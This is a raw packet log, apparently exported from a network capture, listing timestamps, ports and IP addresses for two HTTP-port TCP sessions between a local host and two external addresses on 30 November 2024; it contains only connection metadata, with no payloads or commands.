Nov 30, 2024 04:06:54.634757996 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.634804010 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.634816885 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.635879993 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.635921001 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.635996103 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.636991978 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.637099028 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.638106108 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.638214111 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.639225960 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.639338970 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.639377117 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.640506029 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.640605927 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.640834093 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.641427994 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.641592026 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.641719103 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.642548084 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.642664909 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.642748117 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.643675089 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.643780947 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.643810034 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.644754887 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.644798040 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.644870996 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.645883083 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.645927906 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.645963907 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.646992922 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.647227049 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.647252083 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.648101091 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.648143053 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.648236036 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.649218082 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.649307013 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.649394989 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.649518013 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.649575949 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.649605989 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.649660110 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.650032997 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.650084019 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.650294065 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.650338888 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.650356054 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.650367022 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.650439978 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.650440931 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.650469065 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.651369095 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.651441097 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.651452065 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.651536942 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.651554108 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.651582956 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.652476072 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.652519941 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.652523994 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.652532101 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.652566910 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.652568102 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.652654886 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.653546095 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.653593063 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.653661966 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.653678894 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.653704882 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.653723001 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.653742075 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.654613972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.654746056 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.654875994 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.654886007 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.655713081 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.655839920 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.655894041 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.655904055 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.656239033 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.656239986 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.656788111 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.656883955 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.656990051 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.657001019 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.657707930 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.657805920 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.657886982 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.658027887 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.658087969 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.658098936 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.658991098 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.659110069 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.659209013 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.659219980 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.659768105 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.659836054 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.660067081 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.660111904 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.660186052 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.660226107 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.660296917 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.660336018 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.660370111 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.661150932 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.661194086 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.661212921 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.661261082 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.661406994 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.661457062 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.661540031 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.662235022 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.662322998 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.662328959 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.662391901 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.662511110 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.662607908 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.662678003 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.663321018 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.663367033 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.663539886 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.663583994 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.663670063 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.663681984 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.663717985 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.664423943 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.664473057 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.664541006 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.664602041 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.664731026 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.664776087 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.664812088 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.665507078 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.665590048 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.665596008 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.665767908 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.665843964 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.665893078 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.665971041 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.666578054 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.666627884 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.666661978 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.666709900 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.666955948 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.667000055 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.667220116 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.667673111 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.667717934 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.667764902 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.667812109 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.668083906 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.668199062 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.668209076 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.668747902 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.668796062 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.668992043 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.669042110 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.669193983 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.669236898 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.669298887 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.669836044 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.669878006 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.669950962 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.669996977 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.670278072 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.670321941 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.670382023 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.670938969 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.671011925 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.671049118 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.671062946 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.671412945 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.671466112 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.671664000 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.672014952 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.672066927 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.672097921 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.672147036 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.672527075 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.672574043 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.672607899 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.673100948 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.673146009 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.673239946 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.673284054 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.673616886 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.673655033 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.673716068 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.674180031 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.674243927 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.674273968 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.674355984 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.674732924 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.674841881 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.674967051 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.675282955 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.675360918 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.675389051 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.675482035 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.675831079 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.675950050 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.676348925 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.676456928 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.676944017 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.677135944 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.677437067 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.677540064 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.678077936 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.678160906 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.678324938 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.678369045 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.678369999 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.678534985 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.678575039 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.678597927 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.678733110 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.679171085 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.679217100 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.679276943 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.679615021 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.679661989 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.679790020 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.679836035 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.680289984 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.680330038 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.680394888 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.680691004 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.680732965 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.680815935 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.680860996 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.681384087 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.681432962 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.681468964 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.681797981 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.681886911 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.681940079 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.681968927 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.682485104 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.682538033 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.682605982 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.682867050 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.682971954 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.682974100 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.683018923 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.683593988 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.683640003 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.683687925 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.683967113 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.684007883 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.684062004 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.684107065 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.685035944 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.685082912 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.685254097 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.685300112 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.686145067 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.686192989 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.686254025 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.686300039 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.687222004 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.687268019 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.687341928 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.687386036 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.688309908 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.688395977 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.688422918 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.688580990 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.688694954 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.689393997 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.689511061 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.690484047 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.690565109 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.690582037 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.690650940 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.691565990 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.691613913 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.691694975 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.691740990 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.692675114 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.692723989 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.692753077 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.692795992 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.693772078 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.693845987 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.693866968 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.693913937 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.694884062 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.694931030 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.694947958 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.694988012 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.696026087 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.696069956 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.696140051 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.696187019 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.697040081 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.697084904 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.697154045 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.697201014 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.698084116 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.698123932 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.698131084 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.698167086 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.699202061 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.699251890 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.699282885 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.699330091 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.700342894 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.700360060 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.700388908 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.700404882 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.701366901 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.701416969 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.701447964 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.701494932 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.702487946 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.702538013 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.702584028 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.702630043 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.703574896 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.703618050 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.703620911 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.703656912 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.704607964 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.704654932 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.704720974 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.704802990 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.705696106 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.705739021 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.705796957 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.705841064 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.804848909 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.804913998 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.805399895 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.805540085 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.806483984 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.806606054 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.807570934 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.808769941 CET	49894	80	192.168.2.4	185.215.113.16
